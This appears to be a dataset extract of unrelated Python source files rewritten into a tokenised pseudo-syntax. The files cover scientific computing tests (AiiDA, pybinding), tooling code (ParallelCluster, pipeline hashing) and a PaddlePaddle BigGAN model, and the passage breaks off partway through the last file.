content
stringlengths
0
1.55M
# Import Third-Party <import_from_stmt>requests Response<class_stmt>APIResponse(Response)<block_start><def_stmt>__init__ self req_response formatted_json=<none><block_start><for_stmt>k,v req_response.__dict__.items()<block_start>self.__dict__[k]=v<block_end>self._formatted=formatted_json<block_end>@property<def_stmt>formatted self<block_start><return>self._formatted<block_end>@formatted.setter<def_stmt>formatted self value<block_start>self._formatted=value<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_from_stmt>bitex Kraken<line_sep>k=Kraken()<line_sep>resp=k.ticker('XXBTZEUR')<line_sep>print(resp.formatted)<line_sep>print(resp.json())<block_end>
<import_from_stmt>motrackers.detectors.tf TF_SSDMobileNetV2<import_from_stmt>motrackers.detectors.caffe Caffe_SSDMobileNet<import_from_stmt>motrackers.detectors.yolo YOLOv3<line_sep>
# -*- coding: utf-8 -*- ########################################################################### # Copyright (c), The AiiDA team. All rights reserved. # # This file is part of the AiiDA code. # # # # The code is hosted on GitHub at https://github.com/aiidateam/aiida-core # # For further information on the license, see the LICENSE.txt file # # For further information please visit http://www.aiida.net # ########################################################################### # pylint: disable=redefined-outer-name """Tests for the :mod:`aiida.orm.nodes.data.array.bands` module."""<import_from_stmt>argparse Namespace<import_stmt>pytest<import_from_stmt>aiida.common.exceptions NotExistent<import_from_stmt>aiida.orm BandsData Group User<import_from_stmt>aiida.orm.nodes.data.array.bands get_bands_and_parents_structure<line_sep>@pytest.fixture<def_stmt>alternate_user <block_start>"""Return an alternate ``User`` instance that is not the current default user."""<line_sep>email='alternate<EMAIL>'<try_stmt><block_start><return>User.objects.get(email=email)<block_end><except_stmt>NotExistent<block_start><return>User(email='alternate<EMAIL>').store()<block_end><block_end><class_stmt>TestGetBandsAndParentsStructure<block_start>"""Tests for the :meth:`~aiida.orm.nodes.data.array.bands.get_bands_and_parents_structure` function."""<line_sep>@staticmethod<def_stmt>_get_default_ns <block_start>"""Returns a simple template Namespace"""<line_sep>args=Namespace()<line_sep>args.element=<none><line_sep>args.element_only=<none><line_sep>args.formulamode=<none><line_sep>args.past_days=<none><line_sep>args.group_name=<none><line_sep>args.group_pk=<none><line_sep>args.all_users=<false><line_sep><return>args<block_end>@pytest.mark.parametrize('all_users, expected' ((<true> [<true> <true>]) (<false> [<true> <false>])))@pytest.mark.usefixtures('clear_database_before_test')<def_stmt>test_all_users self alternate_user all_users expected<block_start>"""Test the behavior for the ``all_users`` argument."""<line_sep>bands_default_user=BandsData().store()<line_sep>bands_alternate_user=BandsData(user=alternate_user).store()<line_sep>bands=[bands_default_user bands_alternate_user]<line_sep>args=self._get_default_ns()<line_sep>args.all_users=all_users<line_sep>entries=get_bands_and_parents_structure(args)<line_sep>node_pks=[int(e[0])<for>e entries]<assert_stmt>[node.pk<in>node_pks<for>node bands]<eq>expected<block_end>@pytest.mark.parametrize('argument, attribute' (('group_name' 'label') ('group_pk' 'pk')))@pytest.mark.usefixtures('clear_database_before_test')<def_stmt>test_identifier self argument attribute<block_start>"""Test the behavior for the ``group_name`` and ``group_pk`` arguments."""<line_sep>bands_data_grouped=BandsData().store()<line_sep>_=BandsData().store()<line_sep>bands_group=Group('some_bands_data').store()<line_sep>bands_group.add_nodes(bands_data_grouped)<line_sep>args=self._get_default_ns()<line_sep>setattr(args argument [getattr(bands_group attribute)])<line_sep>entries=get_bands_and_parents_structure(args)<assert_stmt>[int(e[0])<for>e entries]<eq>[bands_data_grouped.pk]<block_end><block_end>
<import_stmt>hashlib<import_from_stmt>...utilities.extended_json json<import_from_stmt>..parsers.base_parser PipelineSpec<import_from_stmt>..errors SpecError<import_from_stmt>.dependency_resolver resolve_dependencies<class_stmt>HashCalculator(object)<block_start><def_stmt>__init__ self<block_start>self.all_pipeline_ids={}<block_end><def_stmt>calculate_hash self spec:PipelineSpec status_mgr ignore_missing_deps=<false><block_start>cache_hash=<none><if_stmt>spec.pipeline_id<in>self.all_pipeline_ids<block_start>message='Duplicate key {0} in {1}'.format(spec.pipeline_id spec.path)<line_sep>spec.validation_errors.append(SpecError('Duplicate Pipeline Id' message))<block_end><else_stmt><block_start><if_stmt>ignore_missing_deps<block_start>cache_hash=''<block_end><else_stmt><block_start>cache_hash=resolve_dependencies(spec self.all_pipeline_ids status_mgr)<block_end>self.all_pipeline_ids[spec.pipeline_id]=spec<if_stmt>len(spec.validation_errors)<g>0<block_start><return>cache_hash<block_end><for_stmt>step spec.pipeline_details['pipeline']<block_start>m=hashlib.md5()<line_sep>m.update(cache_hash.encode('ascii'))<with_stmt>open(step['executor'] 'rb')<as>f<block_start>m.update(f.read())<block_end>m.update(json.dumps(step ensure_ascii=<true> sort_keys=<true>).encode('ascii'))<line_sep>cache_hash=m.hexdigest()<line_sep>step['_cache_hash']=cache_hash<block_end><block_end>spec.cache_hash=cache_hash<block_end><block_end>
# Copyright 2013-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file except in compliance # with the License. A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the 'LICENSE.txt' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=import-outside-toplevel <import_from_stmt>typing List<import_stmt>argparse<import_from_stmt>argparse Namespace<import_from_stmt>pcluster.cli.commands.common CliCommand<class_stmt>ConfigureCommand(CliCommand)<block_start>"""Implement pcluster configure command."""<line_sep># CLI name="configure"<line_sep>help="Start the AWS ParallelCluster configuration."<line_sep>description=help<def_stmt>__init__ self subparsers<block_start>super().__init__(subparsers name=self.name help=self.help description=self.description)<block_end><def_stmt>register_command_args self parser:argparse.ArgumentParser<arrow><none># noqa: D102 <block_start>parser.add_argument("-c" "--config" help="Path to output the generated config file." required=<true>)<block_end><def_stmt>execute self args:Namespace extra_args:List[str]<arrow><none># noqa: D102 #pylint: disable=unused-argument <block_start><import_from_stmt>pcluster.cli.commands.configure.easyconfig configure<line_sep>configure(args)<block_end><block_end>
<import_from_stmt>typing List<import_stmt>pandas<as>pd<import_from_stmt>lightgbm Booster<def_stmt>make_imp_df boosters:List[Booster]<arrow>pd.DataFrame<block_start>df=pd.concat([pd.DataFrame({'name':b.feature_name() 'importance':b.feature_importance()})<for>b boosters])<line_sep><return>df.groupby('name').mean().sort_values('importance').reset_index(level='name').set_index('name')<block_end>
<import_from_stmt>PyQt5 QtCore<import_stmt>pandas<as>pd<import_from_stmt>DyCommon.Ui.DyStatsTableWidget *<class_stmt>DyStatsDataFrameTableWidget(DyStatsTableWidget)<block_start>""" 只显示DF的列,index需要用户自己转换成列 """<def_stmt>__init__ self df parent=<none><block_start>super().__init__(parent=parent readOnly=<true> index=<false> floatCut=<true> autoScroll=<false>)<line_sep>self._initDf(df)<block_end><def_stmt>_initDf self df<block_start>self.setColNames(list(df.columns))<line_sep>self.fastAppendRows(df.values.tolist())<block_end><block_end>
<import_stmt>pytest<import_stmt>numpy<as>np<import_stmt>pybinding<as>pb<import_from_stmt>pybinding.repository graphene group6_tmd<line_sep>models={'graphene-pristine':[graphene.monolayer() pb.rectangle(15)] 'graphene-pristine-oversized':[graphene.monolayer() pb.rectangle(20)] 'graphene-const_potential':[graphene.monolayer() pb.rectangle(15) pb.constant_potential(0.5)] 'graphene-magnetic_field':[graphene.monolayer() pb.rectangle(15) graphene.constant_magnetic_field(1e3)] }<line_sep>@pytest.fixture(scope='module' ids=list(models.keys()) params=models.values())<def_stmt>model request<block_start><return>pb.Model(*request.param)<block_end>ldos_models={**models "mos2":[group6_tmd.monolayer_3band("MoS2") pb.rectangle(6)]}<line_sep>@pytest.mark.parametrize("params" ldos_models.values() ids=list(ldos_models.keys()))<def_stmt>test_ldos params baseline plot_if_fails<block_start>configurations=[{'matrix_format':"CSR" 'optimal_size':<false> 'interleaved':<false>} {'matrix_format':"CSR" 'optimal_size':<true> 'interleaved':<false>} {'matrix_format':"CSR" 'optimal_size':<false> 'interleaved':<true>} {'matrix_format':"ELL" 'optimal_size':<true> 'interleaved':<true>} ]<line_sep>model=pb.Model(*params)<line_sep>kernel=pb.lorentz_kernel()<line_sep>strategies=[pb.kpm(model kernel=kernel silent=<true> **c)<for>c configurations]<line_sep>energy=np.linspace(0 2 25)<line_sep>results=[kpm.calc_ldos(energy broadening=0.15 position=[0 0.07] reduce=<false>)<for>kpm strategies]<line_sep>expected=results[0].with_data(baseline(results[0].data.astype(np.float32)))<for_stmt>i range(len(results))<block_start>plot_if_fails(results[i] expected 'plot' label=i)<block_end><for_stmt>result results<block_start><assert_stmt>pytest.fuzzy_equal(result expected rtol=1e-3 atol=1e-6)<block_end><block_end><def_stmt>test_moments model plot_if_fails<block_start>energy=np.linspace(0 2 25)<line_sep>broadening=0.15<line_sep>position=dict(position=[0 0] sublattice="A")<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>expected_ldos=kpm.calc_ldos(energy broadening **position)<def_stmt>manual_ldos <block_start>idx=model.system.find_nearest(**position)<line_sep>alpha=np.zeros(model.hamiltonian.shape[0])<line_sep>alpha[idx]=1<line_sep>a,b=kpm.scaling_factors<line_sep>num_moments=kpm.kernel.required_num_moments(broadening/a)<line_sep>moments=kpm.moments(num_moments alpha)<line_sep>ns=np.arange(num_moments)<line_sep>scaled_energy=(energy-b)/a<line_sep>k=2/(a<times>np.pi<times>np.sqrt(1-scaled_energy<power>2))<line_sep>chebyshev=np.cos(ns<times>np.arccos(scaled_energy[: np.newaxis]))<line_sep><return>k<times>np.sum(moments.real<times>chebyshev axis=1)<block_end>ldos=expected_ldos.with_data(manual_ldos())<line_sep>plot_if_fails(ldos expected_ldos "plot")<assert_stmt>pytest.fuzzy_equal(ldos expected_ldos rtol=1e-4 atol=1e-6)<with_stmt>pytest.raises(RuntimeError)<as>excinfo<block_start>kpm.moments(10 [1 2 3])<block_end><assert_stmt>"Size mismatch"<in>str(excinfo.value)<with_stmt>pytest.raises(RuntimeError)<as>excinfo<block_start>kpm=pb.kpm(pb.Model(graphene.monolayer()))<line_sep>kpm.moments(10 [1j 2j])<block_end><assert_stmt>"Hamiltonian is real, but the given argument 'alpha' is complex"<in>str(excinfo.value)<block_end><def_stmt>test_kpm_multiple_indices model<block_start>"""KPM can take a vector of column indices and return the Green's function for all of them"""<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>num_sites=model.system.num_sites<line_sep>i,j=num_sites<floordiv>2 num_sites<floordiv>4<line_sep>energy=np.linspace(-0.3 0.3 10)<line_sep>broadening=0.8<line_sep>cols=[j j+1 j+2]<line_sep>gs=kpm.calc_greens(i cols energy broadening)<assert_stmt>len(gs)<eq>len(cols)<line_sep>g=kpm.calc_greens(j i energy broadening)<assert_stmt>pytest.fuzzy_equal(gs[0] g)<block_end><def_stmt>test_kpm_reuse <block_start>"""KPM should return the same result when a single object is used for multiple calculations"""<line_sep>model=pb.Model(graphene.monolayer() graphene.hexagon_ac(10))<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>energy=np.linspace(-5 5 50)<line_sep>broadening=0.1<for_stmt>position [0 0] [6 0]<block_start>actual=kpm.calc_ldos(energy broadening position)<line_sep>expected=pb.kpm(model).calc_ldos(energy broadening position)<assert_stmt>pytest.fuzzy_equal(actual expected rtol=1e-3 atol=1e-6)<block_end><block_end><def_stmt>test_ldos_sublattice <block_start>"""LDOS for A and B sublattices should be antisymmetric for graphene with a mass term"""<line_sep>model=pb.Model(graphene.monolayer() graphene.hexagon_ac(10) graphene.mass_term(1))<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>a,b=(kpm.calc_ldos(np.linspace(-5 5 50) 0.1 [0 0] sub)<for>sub ('A' 'B'))<assert_stmt>pytest.fuzzy_equal(a.data b.data[::-1] rtol=1e-3 atol=1e-6)<block_end><def_stmt>test_optimized_hamiltonian <block_start>"""Currently available only in internal interface"""<import_from_stmt>pybinding _cpp<line_sep>model=pb.Model(graphene.monolayer() graphene.hexagon_ac(10))<line_sep>h=model.hamiltonian<line_sep>oh=_cpp.OptimizedHamiltonian(model.raw_hamiltonian 0)<assert_stmt>oh.matrix.shape<eq>h.shape<assert_stmt>oh.sizes[-1]<eq>h.shape[0]<assert_stmt>len(oh.indices)<eq>h.shape[0]<block_end>dos_models={'graphene-const_potential':[graphene.monolayer() pb.rectangle(25) pb.constant_potential(0.5)] 'graphene-magnetic_field':[graphene.monolayer() pb.rectangle(25) graphene.constant_magnetic_field(1e3)] }<line_sep>@pytest.mark.parametrize("params" dos_models.values() ids=list(dos_models.keys()))<def_stmt>test_dos params baseline plot_if_fails<block_start>configurations=[{'matrix_format':"ELL" 'optimal_size':<false> 'interleaved':<false>} {'matrix_format':"ELL" 'optimal_size':<true> 'interleaved':<true>} ]<line_sep>model=pb.Model(*params)<line_sep>kernel=pb.lorentz_kernel()<line_sep>strategies=[pb.kpm(model kernel=kernel silent=<true> **c)<for>c configurations]<line_sep>energy=np.linspace(0 2 25)<line_sep>results=[kpm.calc_dos(energy broadening=0.15)<for>kpm strategies]<line_sep>expected=results[0].with_data(baseline(results[0].data.astype(np.float32)))<for_stmt>i range(len(results))<block_start>plot_if_fails(results[i] expected 'plot' label=i)<block_end><for_stmt>result results<block_start><assert_stmt>pytest.fuzzy_equal(result expected rtol=1e-3 atol=1e-6)<block_end><block_end>cond_models={'graphene-const_potential':[graphene.monolayer() pb.rectangle(20) pb.constant_potential(0.5)] 'graphene-magnetic_field':[graphene.monolayer() pb.rectangle(20) graphene.constant_magnetic_field(1e3)]}<line_sep>@pytest.mark.parametrize("params" cond_models.values() ids=list(cond_models.keys()))<def_stmt>test_conductivity params baseline plot_if_fails<block_start>configurations=[{'matrix_format':"ELL" 'optimal_size':<false> 'interleaved':<false>} {'matrix_format':"ELL" 'optimal_size':<true> 'interleaved':<true>} ]<line_sep>model=pb.Model(*params)<line_sep>kernel=pb.lorentz_kernel()<line_sep>strategies=[pb.kpm(model energy_range=[-9 9] kernel=kernel silent=<true> **c)<for>c configurations]<line_sep>energy=np.linspace(-2 2 25)<line_sep>results=[kpm.calc_conductivity(energy broadening=0.5 temperature=0 num_points=200)<for>kpm strategies]<line_sep>expected=results[0].with_data(baseline(results[0].data.astype(np.float32)))<for_stmt>i range(len(results))<block_start>plot_if_fails(results[i] expected "plot" label=i)<block_end><for_stmt>result results<block_start><assert_stmt>pytest.fuzzy_equal(result expected rtol=1e-2 atol=1e-5)<block_end><block_end>
<import_from_stmt>.. plugin<import_from_stmt>.cfdocs get_inline_documentation get_completion_docs get_goto_cfml_file <class_stmt>CFMLPlugin(plugin.CFMLPlugin)<block_start><def_stmt>get_completion_docs self cfml_view<block_start><return>get_completion_docs(cfml_view)<block_end><def_stmt>get_inline_documentation self cfml_view doc_type<block_start><return>get_inline_documentation(cfml_view doc_type)<block_end><def_stmt>get_goto_cfml_file self cfml_view<block_start><return>get_goto_cfml_file(cfml_view)<block_end><block_end>
<import_stmt>numpy<as>np<import_stmt>paddle.fluid<as>fluid<import_from_stmt>paddle.fluid layers dygraph<as>dg<import_from_stmt>paddle.fluid.initializer Normal Constant Uniform<class_stmt>ModelCache(object)<block_start>G=<none><line_sep>D=<none><line_sep>train_mode=<false><line_sep>initialized=<false><block_end>model_cache=ModelCache<def_stmt>unpool value<block_start>"""Unpooling operation. N-dimensional version of the unpooling operation from https://www.robots.ox.ac.uk/~vgg/rg/papers/Dosovitskiy_Learning_to_Generate_2015_CVPR_paper.pdf Taken from: https://github.com/tensorflow/tensorflow/issues/2169 Args: value: a Tensor of shape [b, d0, d1, ..., dn, ch] name: name of the op Returns: A Tensor of shape [b, 2*d0, 2*d1, ..., 2*dn, ch] """<line_sep>value=layers.transpose(value [0 2 3 1])<line_sep>sh=value.shape<line_sep>dim=len(sh[1:-1])<line_sep>out=(layers.reshape(value [-1]+sh[-dim:]))<for_stmt>i range(dim 0 -1)<block_start>out=layers.concat([out layers.zeros_like(out)] i)<block_end>out_size=[-1]+[s<times>2<for>s sh[1:-1]]+[sh[-1]]<line_sep>out=layers.reshape(out out_size)<line_sep>out=layers.transpose(out [0 3 1 2])<line_sep><return>out<block_end><class_stmt>ReLU(dg.Layer)<block_start><def_stmt>forward self x<block_start><return>layers.relu(x)<block_end><block_end><class_stmt>SoftMax(dg.Layer)<block_start><def_stmt>__init__ self **kwargs<block_start>super().__init__()<line_sep>self.kwargs=kwargs<block_end><def_stmt>forward self x<block_start><return>layers.softmax(x **self.kwargs)<block_end><block_end><class_stmt>BatchNorm(dg.BatchNorm)# not trainable <block_start><def_stmt>__init__ self *args **kwargs<block_start><if_stmt>'affine'<in>kwargs<block_start>affine=kwargs.pop('affine')<block_end><else_stmt><block_start>affine=<true><block_end>super().__init__(*args **kwargs)<line_sep>self._use_global_stats=<true><if_stmt><not>affine<block_start>weight=(self.weight<times>0+1).detach()<line_sep>bias=(self.bias<times>0).detach()<del_stmt>self._parameters['bias']<del_stmt>self._parameters['weight']<line_sep>self.weight=weight<line_sep>self.bias=bias<block_end>self.weight.stop_gradient=<true><line_sep>self.bias.stop_gradient=<true><line_sep>self.accumulated_mean=self.create_parameter(shape=[args[0]] default_initializer=Constant(0.0))<line_sep>self.accumulated_var=self.create_parameter(shape=[args[0]] default_initializer=Constant(0.0))<line_sep>self.accumulated_counter=self.create_parameter(shape=[1] default_initializer=Constant(1e-12))<line_sep>self.accumulated_mean.stop_gradient=<true><line_sep>self.accumulated_var.stop_gradient=<true><line_sep>self.accumulated_counter.stop_gradient=<true><block_end><def_stmt>forward self inputs *args **kwargs<block_start><if_stmt>'_mean'<in>self._parameters<block_start><del_stmt>self._parameters['_mean']<block_end><if_stmt>'_variance'<in>self._parameters<block_start><del_stmt>self._parameters['_variance']<block_end><if_stmt><not>model_cache.initialized<and><not>model_cache.train_mode<block_start>self._mean=(self.accumulated_mean/self.accumulated_counter)<line_sep>self._variance=(self.accumulated_var/self.accumulated_counter)<block_end><if_stmt>model_cache.train_mode<block_start>axes=[0]+([]<if>len(inputs.shape)<eq>2<else>list(range(2 len(inputs.shape))))<line_sep>_mean=layers.reduce_mean(inputs axes keep_dim=<true>)<line_sep>self._mean=layers.reduce_mean(inputs axes keep_dim=<false>)<line_sep>self._variance=layers.reduce_mean((inputs-_mean)<power>2 axes)<block_end><else_stmt><block_start>self._mean=self._mean.detach()<line_sep>self._variance=self._variance.detach()<block_end><return>super().forward(inputs *args **kwargs)<block_end><block_end><class_stmt>SpectralNorm(dg.Layer)# not trainable <block_start><def_stmt>__init__ self module name='weight' power_iterations=2<block_start>super().__init__()<line_sep>self.module=module<line_sep>self.name=name<line_sep>self.power_iterations=power_iterations<line_sep>self.initialized=<false><if_stmt><not>self._made_params()<block_start>self._make_params()<block_end><block_end><def_stmt>_update_u self<block_start>w=self.weight<line_sep>u=self.weight_u<if_stmt>len(w.shape)<eq>4<block_start>_w=layers.transpose(w [2 3 1 0])<line_sep>_w=layers.reshape(_w [-1 _w.shape[-1]])<block_end><else_stmt><block_start>_w=layers.reshape(w [-1 w.shape[-1]])<line_sep>_w=layers.reshape(_w [-1 _w.shape[-1]])<block_end>singular_value="left"<if>_w.shape[0]<le>_w.shape[1]<else>"right"<line_sep>norm_dim=0<if>_w.shape[0]<le>_w.shape[1]<else>1<for_stmt>_ range(self.power_iterations)<block_start><if_stmt>singular_value<eq>"left"<block_start>v=layers.l2_normalize(layers.matmul(_w u transpose_x=<true>) axis=norm_dim)<line_sep>u=layers.l2_normalize(layers.matmul(_w v) axis=norm_dim)<block_end><else_stmt><block_start>v=layers.l2_normalize(layers.matmul(u _w transpose_y=<true>) axis=norm_dim)<line_sep>u=layers.l2_normalize(layers.matmul(v _w) axis=norm_dim)<block_end><block_end><if_stmt>singular_value<eq>"left"<block_start>sigma=layers.matmul(layers.matmul(u _w transpose_x=<true>) v)<block_end><else_stmt><block_start>sigma=layers.matmul(layers.matmul(v _w) u transpose_y=<true>)<block_end>_w=w/sigma.detach()<line_sep>setattr(self.module self.name _w.detach())<block_end># setattr(self.module, self.name, _w) # self.weight_u.set_value(u) <def_stmt>_made_params self<block_start><try_stmt><block_start>self.weight<line_sep>self.weight_u<line_sep><return><true><block_end><except_stmt>AttributeError<block_start><return><false><block_end><block_end><def_stmt>_make_params self# paddle linear weight is similar with tf's, and conv weight is similar with pytorch's. <block_start>w=getattr(self.module self.name)<if_stmt>len(w.shape)<eq>4<block_start>_w=layers.transpose(w [2 3 1 0])<line_sep>_w=layers.reshape(_w [-1 _w.shape[-1]])<block_end><else_stmt><block_start>_w=layers.reshape(w [-1 w.shape[-1]])<block_end>singular_value="left"<if>_w.shape[0]<le>_w.shape[1]<else>"right"<line_sep>norm_dim=0<if>_w.shape[0]<le>_w.shape[1]<else>1<line_sep>u_shape=(_w.shape[0] 1)<if>singular_value<eq>"left"<else>(1 _w.shape[-1])<line_sep>u=self.create_parameter(shape=u_shape default_initializer=Normal(0 1))<line_sep>u.stop_gradient=<true><line_sep>u.set_value(layers.l2_normalize(u axis=norm_dim))<del_stmt>self.module._parameters[self.name]<line_sep>self.add_parameter("weight" w)<line_sep>self.add_parameter("weight_u" u)<block_end><def_stmt>forward self *args **kwargs<block_start><if_stmt><not>self.initialized<block_start>self._update_u()<line_sep>self.initialized=<true><block_end><return>self.module.forward(*args **kwargs)<block_end><block_end><class_stmt>SelfAttention(dg.Layer)<block_start><def_stmt>__init__ self in_dim activation=layers.relu<block_start>super().__init__()<line_sep>self.chanel_in=in_dim<line_sep>self.activation=activation<line_sep>self.theta=SpectralNorm(dg.Conv2D(in_dim in_dim<floordiv>8 1 bias_attr=<false>))<line_sep>self.phi=SpectralNorm(dg.Conv2D(in_dim in_dim<floordiv>8 1 bias_attr=<false>))<line_sep>self.pool=dg.Pool2D(2 'max' 2)<line_sep>self.g=SpectralNorm(dg.Conv2D(in_dim in_dim<floordiv>2 1 bias_attr=<false>))<line_sep>self.o_conv=SpectralNorm(dg.Conv2D(in_dim<floordiv>2 in_dim 1 bias_attr=<false>))<line_sep>self.gamma=self.create_parameter([1 ] default_initializer=Constant(0.0))<line_sep>self.softmax=SoftMax(axis=-1)<block_end><def_stmt>forward self x<block_start>m_batchsize,C,width,height=x.shape<line_sep>N=height<times>width<line_sep>theta=self.theta(x)<line_sep>phi=self.phi(x)<line_sep>phi=self.pool(phi)<line_sep>phi=layers.reshape(phi (m_batchsize -1 N<floordiv>4))<line_sep>theta=layers.reshape(theta (m_batchsize -1 N))<line_sep>theta=layers.transpose(theta (0 2 1))<line_sep>attention=self.softmax(layers.bmm(theta phi))<line_sep>g=self.g(x)<line_sep>g=layers.reshape(self.pool(g) (m_batchsize -1 N<floordiv>4))<line_sep>attn_g=layers.reshape(layers.bmm(g layers.transpose(attention (0 2 1))) (m_batchsize -1 width height))<line_sep>out=self.o_conv(attn_g)<line_sep><return>self.gamma<times>out+x<block_end><block_end><class_stmt>ConditionalBatchNorm(dg.Layer)<block_start><def_stmt>__init__ self num_features num_classes epsilon=1e-5 momentum=0.1<block_start>super().__init__()<line_sep>self.bn_in_cond=BatchNorm(num_features affine=<false> epsilon=epsilon momentum=momentum)<line_sep>self.gamma_embed=SpectralNorm(dg.Linear(num_classes num_features bias_attr=<false>))<line_sep>self.beta_embed=SpectralNorm(dg.Linear(num_classes num_features bias_attr=<false>))<block_end><def_stmt>forward self x y<block_start>out=self.bn_in_cond(x)<if_stmt>isinstance(y list)<block_start>gamma,beta=y<line_sep>out=layers.reshape(gamma (0 0 1 1))<times>out+layers.reshape(beta (0 0 1 1))<line_sep><return>out<block_end>gamma=self.gamma_embed(y)<line_sep>beta=self.beta_embed(y)<line_sep>out=layers.reshape(gamma (0 0 1 1))<times>out+layers.reshape(beta (0 0 1 1))<line_sep><return>out<block_end><block_end><class_stmt>ResBlock(dg.Layer)<block_start><def_stmt>__init__ self in_channel out_channel kernel_size=[3 3] padding=1 stride=1 n_class=<none> conditional=<true> activation=layers.relu upsample=<true> downsample=<false> z_dim=128 use_attention=<false> skip_proj=<none><block_start>super().__init__()<if_stmt>conditional<block_start>self.cond_norm1=ConditionalBatchNorm(in_channel z_dim)<block_end>self.conv0=SpectralNorm(dg.Conv2D(in_channel out_channel kernel_size stride padding))<if_stmt>conditional<block_start>self.cond_norm2=ConditionalBatchNorm(out_channel z_dim)<block_end>self.conv1=SpectralNorm(dg.Conv2D(out_channel out_channel kernel_size stride padding))<line_sep>self.skip_proj=<false><if_stmt>skip_proj<is><not><true><and>(upsample<or>downsample)<block_start>self.conv_sc=SpectralNorm(dg.Conv2D(in_channel out_channel 1 1 0))<line_sep>self.skip_proj=<true><block_end><if_stmt>use_attention<block_start>self.attention=SelfAttention(out_channel)<block_end>self.upsample=upsample<line_sep>self.downsample=downsample<line_sep>self.activation=activation<line_sep>self.conditional=conditional<line_sep>self.use_attention=use_attention<block_end><def_stmt>forward self input condition=<none><block_start>out=input<if_stmt>self.conditional<block_start>out=self.cond_norm1(out condition[0]<if>isinstance(condition list)<else>condition)<block_end>out=self.activation(out)<if_stmt>self.upsample<block_start>out=unpool(out)<block_end>out=self.conv0(out)<if_stmt>self.conditional<block_start>out=self.cond_norm2(out condition[1]<if>isinstance(condition list)<else>condition)<block_end>out=self.activation(out)<line_sep>out=self.conv1(out)<if_stmt>self.downsample<block_start>out=layers.pool2d(out 2 pool_type='avg' pool_stride=2)<block_end><if_stmt>self.skip_proj<block_start>skip=input<if_stmt>self.upsample<block_start>skip=unpool(skip)<block_end>skip=self.conv_sc(skip)<if_stmt>self.downsample<block_start>skip=layers.pool2d(skip 2 pool_type='avg' pool_stride=2)<block_end>out=out+skip<block_end><else_stmt><block_start>skip=input<block_end><if_stmt>self.use_attention<block_start>out=self.attention(out)<block_end><return>out<block_end><block_end><class_stmt>Generator(dg.Layer)# not trainable <block_start><def_stmt>__init__ self code_dim=128 n_class=1000 chn=96 blocks_with_attention="B4" resolution=512<block_start>super().__init__()<def_stmt>GBlock in_channel out_channel n_class z_dim use_attention<block_start><return>ResBlock(in_channel out_channel n_class=n_class z_dim=z_dim use_attention=use_attention)<block_end>self.embed_y=dg.Linear(n_class 128 bias_attr=<false>)<line_sep>self.chn=chn<line_sep>self.resolution=resolution<line_sep>self.blocks_with_attention=set(blocks_with_attention.split(","))<line_sep>self.blocks_with_attention.discard('')<line_sep>gblock=[]<line_sep>in_channels,out_channels=self.get_in_out_channels()<line_sep>self.num_split=len(in_channels)+1<line_sep>z_dim=code_dim<floordiv>self.num_split+128<line_sep>self.noise_fc=SpectralNorm(dg.Linear(code_dim<floordiv>self.num_split 4<times>4<times>in_channels[0]))<line_sep>self.sa_ids=[int(s.split('B')[-1])<for>s self.blocks_with_attention]<for_stmt>i,(nc_in nc_out) enumerate(zip(in_channels out_channels))<block_start>gblock.append(GBlock(nc_in nc_out n_class=n_class z_dim=z_dim use_attention=(i+1)<in>self.sa_ids))<block_end>self.blocks=dg.LayerList(gblock)<line_sep>self.output_layer_bn=BatchNorm(1<times>chn epsilon=1e-5)<line_sep>self.output_layer_conv=SpectralNorm(dg.Conv2D(1<times>chn 3 [3 3] padding=1))<block_end><def_stmt>get_in_out_channels self<block_start>resolution=self.resolution<if_stmt>resolution<eq>1024<block_start>channel_multipliers=[16 16 8 8 4 2 1 1 1]<block_end><elif_stmt>resolution<eq>512<block_start>channel_multipliers=[16 16 8 8 4 2 1 1]<block_end><elif_stmt>resolution<eq>256<block_start>channel_multipliers=[16 16 8 8 4 2 1]<block_end><elif_stmt>resolution<eq>128<block_start>channel_multipliers=[16 16 8 4 2 1]<block_end><elif_stmt>resolution<eq>64<block_start>channel_multipliers=[16 16 8 4 2]<block_end><elif_stmt>resolution<eq>32<block_start>channel_multipliers=[4 4 4 4]<block_end><else_stmt><block_start><raise>ValueError("Unsupported resolution: {}".format(resolution))<block_end>in_channels=[self.chn<times>c<for>c channel_multipliers[:-1]]<line_sep>out_channels=[self.chn<times>c<for>c channel_multipliers[1:]]<line_sep><return>in_channels out_channels<block_end><def_stmt>forward self input class_id input_class_emb=<false><block_start><if_stmt>isinstance(input list)<block_start>codes=[input[0]]<line_sep>codes<augadd>[input[2<times>i+1:2<times>i+3]<for>i range(len(input)<floordiv>2)]<block_end><else_stmt><block_start>codes=layers.split(input self.num_split 1)<block_end><if_stmt><not>input_class_emb<block_start>class_emb=self.embed_y(class_id)# 128 <block_end><else_stmt><block_start>class_emb=class_id<block_end>out=self.noise_fc(codes[0])<line_sep>out=layers.transpose(layers.reshape(out (out.shape[0] 4 4 -1)) (0 3 1 2))<for_stmt>i,(code gblock) enumerate(zip(codes[1:] self.blocks))<block_start><if_stmt>isinstance(input list)<block_start>condition=[layers.concat([c class_emb] 1)<for>c code]<block_end><else_stmt><block_start>condition=layers.concat([code class_emb] 1)<block_end>out=gblock(out condition)<block_end>out=self.output_layer_bn(out)<line_sep>out=layers.relu(out)<line_sep>out=self.output_layer_conv(out)<line_sep><return>(layers.tanh(out)+1)/2<block_end><block_end><class_stmt>Discriminator(dg.Layer)<block_start><def_stmt>__init__ self n_class=1000 chn=96 blocks_with_attention="B2" resolution=256<block_start>super().__init__()<def_stmt>DBlock in_channel out_channel downsample=<true> use_attention=<false> skip_proj=<none><block_start><return>ResBlock(in_channel out_channel conditional=<false> upsample=<false> downsample=downsample use_attention=use_attention skip_proj=skip_proj)<block_end>self.chn=chn<line_sep>self.colors=3<line_sep>self.resolution=resolution<line_sep>self.blocks_with_attention=set(blocks_with_attention.split(","))<line_sep>self.blocks_with_attention.discard('')<line_sep>dblock=[]<line_sep>in_channels,out_channels=self.get_in_out_channels()<line_sep>self.sa_ids=[int(s.split('B')[-1])<for>s self.blocks_with_attention]<for_stmt>i,(nc_in nc_out) enumerate(zip(in_channels[:-1] 